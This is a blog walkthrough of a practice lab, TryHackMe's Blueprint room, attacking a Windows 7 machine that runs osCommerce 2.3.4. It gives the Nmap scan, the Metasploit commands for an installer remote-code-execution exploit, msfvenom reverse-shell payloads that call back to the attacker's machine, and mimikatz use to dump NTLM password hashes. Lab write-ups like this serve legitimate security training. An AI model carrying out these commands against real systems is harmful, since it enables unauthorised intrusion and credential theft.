Post

TryHackMe: Blueprint

A walkthrough of TryHackMe's Blueprint room, covering exploitation of a vulnerable Windows machine running osCommerce 2.3.4.

TryHackMe: Blueprint

TryHackMe: Blueprint CTF — Writeup | 25 November 2025

TryHackMe Logo Room Banner

Overview

This room covers the exploitation of a vulnerable Windows machine running osCommerce 2.3.4. You’ll perform reconnaissance, gain initial access via a web exploit, escalate privileges, and extract sensitive information. The walkthrough demonstrates practical techniques for web exploitation, privilege escalation, and credential harvesting.


Reconnaissance & Scanning

Nmap

Perform a full port and service scan:

1
nmap -Pn -T4 -n -sC -sV -p- -oN scan_nmap.txt 10.49.147.197

Scan Summary:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 7.5
|_http-title: 404 - File or directory not found.
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
|_ssl-date: TLS randomness does not represent time
| http-methods: 
|_  Potentially risky methods: TRACE
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_http-title: Index of /
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB 10.3.23 or earlier (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 0a:59:52:bd:e5:fd (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-11-25T17:45:12+00:00
|_clock-skew: mean: -5m53s, deviation: 1s, median: -5m54s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-11-25T17:45:12
|_  start_date: 2025-11-25T17:39:03

From the Nmap scan, we identified several open ports and services running on the target machine:

  • Port 80: IIS web server
  • Port 443: Apache web server with SSL
  • Port 8080: Another Apache web server

Access the website on port 8080

8080 Homepage

we see an osCommerce version 2.3.4 installation page.

Exploitation

so let`s check the exploits for osCommerce 2.3.4

Exploit DB osCommerce

we get osCommerce 2.3.4 - Remote Code Execution (RCE) (Metasploit)

Exploit osCommerce 2.3.4 RCE using Metasploit

search for the exploit in Metasploit:

Metasploit Search

we find the module: exploit/multi/http/oscommerce_installer_unauth_code_exec

Use the following Metasploit commands to exploit the vulnerability:

1
2
3
4
5
6
7
8
9
10
msfconsole
use exploit/multi/http/oscommerce_installer_unauth_code_exec
set RHOSTS <TARGET_IP>
set RPORT 8080
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
set LPORT 4444
set URI /oscommerce-2.3.4/catalog/install/
exploit
Meterpreter Shell

We successfully obtain a Meterpreter shell on the target machine, with user-level access.

Now we can proceed with privilege escalation to gain root/Administrator access.

For that we will use metasploit payload windows/meterpreter/reverse_tcp.

build the payload using msfvenom:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=1111 -f exe -o shell.exe

we get shell.exe file, that we will upload to the target machine using meterpreter shell.

1
upload shell.exe <PATH>/shell.exe
Upload Shell

Now, we need to execute the uploaded payload to get a reverse shell back to our machine.

1
execute -f <PATH>/shell.exe

now start another metasploit listener for the reverse shell:

1
2
3
4
5
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
set LPORT 1111
exploit
Reverse Shell

We successfully get a reverse shell back to our machine with Administrator privileges.

Now we can explore the target machine and capture the flags.

Now find Lab user NTLM hash to find NTLM(New Technology LAN Manager) hash, we can use the mimikatz tool within the meterpreter shell.

1
load mimikatz

Mimikatz is a tool used to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.

Mimikatz Load

For extracting the NTLM hash, we can use the following mimikatz command:

1
lsa_dump_sam
NTML Hash

after getting the NTML hash, we can use hashes.com to crack it and get the plaintext password.

Hashes.com

Get the root/Administrator flag located at C:\Users\Administrator\Desktop\root.txt.txt

1
cat C:\Users\Administrator\Desktop\root.txt.txt
Root Flag

Room Complete!

Completed

Happy Hacking!

Hacking GIF
This post is licensed under CC BY 4.0 by the author.